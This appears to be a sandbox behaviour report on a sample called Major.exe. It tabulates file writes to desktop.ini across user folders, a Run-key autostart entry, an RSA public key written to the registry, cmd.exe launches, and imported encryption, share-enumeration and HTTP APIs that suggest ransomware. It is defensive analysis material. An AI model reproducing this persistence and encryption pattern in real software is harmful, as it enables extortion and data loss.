| Read | \Users\Public\Libraries\desktop.ini | size = 175, size_out = 175 |
|
1 | |
| Read | \Users\Public\Music\desktop.ini | size = 380, size_out = 380 |
|
1 | |
| Read | \Users\Public\Pictures\desktop.ini | size = 380, size_out = 380 |
|
1 | |
| Read | \Users\Public\Videos\desktop.ini | size = 380, size_out = 380 |
|
1 | |
| Read | \Users\FD1HVy\Documents\My Shapes\desktop.ini | size = 216, size_out = 216 |
|
1 | |
| Read | \Users\FD1HVy\Favorites\Links\desktop.ini | size = 80, size_out = 80 |
|
1 | |
| Read | \Users\FD1HVy\Pictures\Camera Roll\desktop.ini | size = 190, size_out = 190 |
|
1 | |
| Read | \Users\FD1HVy\Pictures\Saved Pictures\desktop.ini | size = 190, size_out = 190 |
|
1 | |
| Write | \Users\desktop.ini | size = 174 |
|
1 | |
| Write | \Users\desktop.ini | size = 23 |
|
2 | |
| Write | \Users\desktop.ini | size = 350 |
|
1 | |
| Write | \$Recycle.Bin\S-1-5-18\desktop.ini | size = 129 |
|
1 | |
| Write | \$Recycle.Bin\S-1-5-18\desktop.ini | size = 23 |
|
2 | |
| Write | \$Recycle.Bin\S-1-5-18\desktop.ini | size = 350 |
|
1 | |
| Write | \$Recycle.Bin\S-1-5-21-1051304884-625712362-2192934891-1000\desktop.ini | size = 129 |
|
1 | |
| Write | \$Recycle.Bin\S-1-5-21-1051304884-625712362-2192934891-1000\desktop.ini | size = 23 |
|
2 | |
| Write | \$Recycle.Bin\S-1-5-21-1051304884-625712362-2192934891-1000\desktop.ini | size = 350 |
|
1 | |
| Write | \Users\Public\desktop.ini | size = 174 |
|
1 | |
| Write | \Users\Public\desktop.ini | size = 23 |
|
2 | |
| Write | \Users\Public\desktop.ini | size = 350 |
|
1 | |
| Write | \Users\FD1HVy\Contacts\desktop.ini | size = 412 |
|
1 | |
| Write | \Users\FD1HVy\Contacts\desktop.ini | size = 23 |
|
2 | |
| Write | \Users\FD1HVy\Contacts\desktop.ini | size = 350 |
|
1 | |
|
For performance reasons, the remaining 4004 entries are omitted.
The remaining entries can be found in glog.xml. |
|||||
Registry (8)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion | value_name = ProductName, data = 87 |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion | value_name = kakashka, data = 192 |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion | value_name = kakashka, data = -----BEGIN PUBLIC KEY----- MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu7d160dwRhkwaE8DSerZ ltvl1khS3K3WEtrkURyegC90SFTU1j3n0hGL0poPNmW8d2EKN66iOOGQR1G6od2y Vl5SttR6UztFGypPRGsEbfJlngS0V69Ch7/0lO5BMqBZTAZAypf4yKZVnmwpGNoj SZAw+L5Zci1S0O2WF4szNtolA/EW9W4wtZEkDrHgPsHn0DQnQXSP26NpCBuiFcxr vfu0tuaeovVnEKhIwEOdoh/GBKiW2+eiP4W2CGouBX0G+9a7EWHKeTSkPZ8xnOhl ui8V0sSrzgCWflDwq6Ty7wh6TPmzjyFCsvcdm1/gBiqMkG5lgQzEztjPLdpblfbM vQIDAQAB -----END PUBLIC KEY----- , size = 902, type = REG_SZ |
|
1 | |
| Write Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run | value_name = Major.exe, data = C:\WINDOWS\Major.exe, size = 41, type = REG_SZ |
|
1 |
Process (6)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\System32\cmd.exe | os_pid = 0xef8, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\Windows\System32\cmd.exe | os_pid = 0xac8, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\Windows\System32\cmd.exe | os_pid = 0x37c, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\Windows\System32\cmd.exe | os_pid = 0x754, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\Windows\System32\cmd.exe | os_pid = 0x8e8, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\Windows\System32\cmd.exe | os_pid = 0x9b0, show_window = SW_SHOWNORMAL |
|
1 |
Module (237)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x75e90000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x761b0000 |
|
1 | |
| Load | CRYPT32.dll | base_address = 0x74940000 |
|
1 | |
| Load | MPR.dll | base_address = 0x74500000 |
|
1 | |
| Load | USER32.dll | base_address = 0x74b70000 |
|
1 | |
| Load | WININET.dll | base_address = 0x74230000 |
|
1 | |
| Load | api-ms-win-core-synch-l1-2-0 | base_address = 0x74ea0000 |
|
2 | |
| Load | api-ms-win-core-fibers-l1-1-1 | base_address = 0x74ea0000 |
|
2 | |
| Load | api-ms-win-core-localization-l1-2-1 | base_address = 0x74ea0000 |
|
1 | |
| Load | api-ms-win-appmodel-runtime-l1-1-1 | base_address = 0x75ba0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75e90000 |
|
2 | |
| Get Handle | c:\users\fd1hvy\desktop\major.exe | base_address = 0x400000, flags = GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS |
|
1 | |
| Get Filename | - | process_name = c:\users\fd1hvy\desktop\major.exe, file_name_orig = C:\Users\FD1HVy\Desktop\Major.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x75ea5d10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x75ea4aa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x75efeed0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetWindowsDirectoryW, address_out = 0x75ea5730 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Wow64DisableWow64FsRedirection, address_out = 0x75ea6b30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x75efed10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileW, address_out = 0x75eff3b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVolumeInformationW, address_out = 0x75eff020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetPriorityClass, address_out = 0x75ea65c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleWindow, address_out = 0x75ee9b20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindClose, address_out = 0x75efed70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindFirstFileW, address_out = 0x75efedf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindNextFileW, address_out = 0x75efee40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x75ea6760 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileSizeEx, address_out = 0x75efef40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x75eff090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointer, address_out = 0x75eff120 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x75ea4610 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileAttributesW, address_out = 0x75eff100 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MoveFileExW, address_out = 0x75ea4370 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x75ea5ae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x75ea50d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x75ea5090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalDriveStringsW, address_out = 0x75efefb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenMutexW, address_out = 0x75efebf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateMutexW, address_out = 0x75efeb70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrlenW, address_out = 0x75ea6c70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcatW, address_out = 0x75ee71a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemInfo, address_out = 0x75ea54d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x75efeab0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x75eff180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x75ea6740 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x75ea5b00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnregisterWaitEx, address_out = 0x75ea6910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryDepthSList, address_out = 0x77c152d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InterlockedPopEntrySList, address_out = 0x77bf5840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReleaseSemaphore, address_out = 0x75efec30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = VirtualProtect, address_out = 0x75ea6a30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = VirtualFree, address_out = 0x75ea69d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = VirtualAlloc, address_out = 0x75ea6970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersionExW, address_out = 0x75ea56f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleA, address_out = 0x75ea50b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetThreadTimes, address_out = 0x75ea55e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnregisterWait, address_out = 0x75edc850 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x75ea5010 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x75ea3cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x75efea10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x75ea5b40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrlenA, address_out = 0x75ea6c50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x75ea5bc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x77bfb2d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x77bfb250 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77bdfb90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x75efec50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ResetEvent, address_out = 0x75efec40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObjectEx, address_out = 0x75efecb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x75efeb30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x75ea51b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x75ea5960 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x75ea5930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x75ea68d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x75ea6720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x75ea5320 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x75ea5da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x75efea20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x75ea8820 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x75ea5530 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeSListHead, address_out = 0x77c16680 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x75ea67e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x75ea6b10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x75ea5c40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x75ea53b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x75efeac0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThread, address_out = 0x75ea8810 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetExitCodeThread, address_out = 0x75ea4ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TryEnterCriticalSection, address_out = 0x77c0aae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x77c129e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x77c11ec0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x75ea4f00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x75efebb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x75ea6820 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x75ea6850 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x75ea6870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x75ea6830 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount, address_out = 0x75efdd50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringW, address_out = 0x75ea4430 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x75ea5a60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoW, address_out = 0x75ea5040 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x75ea4d10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RaiseException, address_out = 0x75ea5e20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x75ea7c10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibrary, address_out = 0x75ea4c40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x75ea5ac0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InterlockedPushEntrySList, address_out = 0x77bf2810 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InterlockedFlushSList, address_out = 0x77c12a20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x75ea5110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameA, address_out = 0x75ea5070 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x75ea5330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineA, address_out = 0x75ea4cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x75ea4cc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x75ea4ca0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x77bf2dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x75ea46b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x77c16390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryAndExitThread, address_out = 0x75ea4c60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x75ea57f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x77bef630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x75efef60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocale, address_out = 0x75ea5a00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLCID, address_out = 0x75ea56a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesW, address_out = 0x75ea49c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindFirstFileExA, address_out = 0x75efedc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindNextFileA, address_out = 0x75efee20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x75ea59c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x75ea5160 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x75ea4eb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x75ea4c20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEnvironmentVariableA, address_out = 0x75ea64c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x75ea51f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x75ea6620 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x77c0a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x75efee70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x75eff440 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x75eff450 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x75eff130 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x75eff500 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateTimerQueue, address_out = 0x75ea46e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SignalObjectAndWait, address_out = 0x75ea8120 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SwitchToThread, address_out = 0x75ea6790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadPriority, address_out = 0x75ea66c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetThreadPriority, address_out = 0x75ea5610 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x75ea71b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateTimerQueueTimer, address_out = 0x75ea46f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ChangeTimerQueueTimer, address_out = 0x75ea43f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteTimerQueueTimer, address_out = 0x75ea4780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetNumaHighestNodeNumber, address_out = 0x75ea75e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessAffinityMask, address_out = 0x75ee3230 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadAffinityMask, address_out = 0x75ee6e40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RegisterWaitForSingleObject, address_out = 0x75edc7d0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = CryptDestroyKey, address_out = 0x761cfa60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x761ced60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x761cf460 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x761ce580 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x761ce5a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = CryptEncrypt, address_out = 0x761e2cf0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = CryptGenRandom, address_out = 0x761d0730 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetUserNameW, address_out = 0x761cf890 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = CryptReleaseContext, address_out = 0x761cfbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = CryptAcquireContextW, address_out = 0x761cfa40 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x761cf530 |
|
1 | |
| Get Address | c:\windows\syswow64\crypt32.dll | function = CryptImportPublicKeyInfo, address_out = 0x7496cfe0 |
|
1 | |
| Get Address | c:\windows\syswow64\crypt32.dll | function = CryptStringToBinaryW, address_out = 0x7495ceb0 |
|
1 | |
| Get Address | c:\windows\syswow64\crypt32.dll | function = CryptBinaryToStringW, address_out = 0x7495c670 |
|
1 | |
| Get Address | c:\windows\syswow64\crypt32.dll | function = CryptDecodeObjectEx, address_out = 0x74985e90 |
|
1 | |
| Get Address | c:\windows\syswow64\crypt32.dll | function = CryptBinaryToStringA, address_out = 0x7495c740 |
|
1 | |
| Get Address | c:\windows\syswow64\mpr.dll | function = WNetOpenEnumW, address_out = 0x74502790 |
|
1 | |
| Get Address | c:\windows\syswow64\mpr.dll | function = WNetEnumResourceW, address_out = 0x74502410 |
|
1 | |
| Get Address | c:\windows\syswow64\mpr.dll | function = WNetCloseEnum, address_out = 0x74502640 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = ShowWindow, address_out = 0x74ba3ee0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SystemParametersInfoW, address_out = 0x74b9f210 |
|
1 | |
| Get Address | c:\windows\syswow64\wininet.dll | function = InternetOpenW, address_out = 0x7434e9e0 |
|
1 | |
| Get Address | c:\windows\syswow64\wininet.dll | function = HttpSendRequestW, address_out = 0x74359490 |
|
1 | |
| Get Address | c:\windows\syswow64\wininet.dll | function = HttpQueryInfoW, address_out = 0x743b86e0 |
|
1 | |
| Get Address | c:\windows\syswow64\wininet.dll | function = InternetCloseHandle, address_out = 0x7433d000 |
|
1 | |
| Get Address | c:\windows\syswow64\wininet.dll | function = HttpOpenRequestW, address_out = 0x743abdd0 |
|
1 | |
| Get Address | c:\windows\syswow64\wininet.dll | function = InternetReadFile, address_out = 0x74363a70 |
|
1 | |
| Get Address | c:\windows\syswow64\wininet.dll | function = InternetConnectW, address_out = 0x7433e000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernelbase.dll | function = InitializeCriticalSectionEx, address_out = 0x74f97060 |
|
2 | |
| Get Address | c:\windows\syswow64\kernelbase.dll | function = FlsAlloc, address_out = 0x74f9bea0 |
|
2 | |
| Get Address | c:\windows\syswow64\kernelbase.dll | function = FlsSetValue, address_out = 0x74f92550 |
|
2 | |
| Get Address | c:\windows\syswow64\kernelbase.dll | function = FlsGetValue, address_out = 0x74f870c0 |
|
2 | |
| Get Address | c:\windows\syswow64\kernelbase.dll | function = LCMapStringEx, address_out = 0x74f7ed00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeConditionVariable, address_out = 0x77c13a00 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SleepConditionVariableCS, address_out = 0x7500fca0 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WakeAllConditionVariable, address_out = 0x77c18a90 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x75ea4ae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x75ea4b00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x75ea4b20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x75ea4b40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x75efebc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitOnceExecuteOnce, address_out = 0x74f95550 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x75efeb20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreW, address_out = 0x75efeb90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x75efeb80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x75ea6d30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x77bfd7c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x77bfb840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x77bfb740 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x75ea6d70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x77bfc0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x77bfbe10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77c22b20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x77c18e50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x77c152f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x75ea4510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x74f9e260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x75ea0db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleEx, address_out = 0x75ea43d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandle, address_out = 0x75eff110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimePreciseAsFileTime, address_out = 0x75eff1e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WakeConditionVariable, address_out = 0x77c88c50 |
|
1 | |
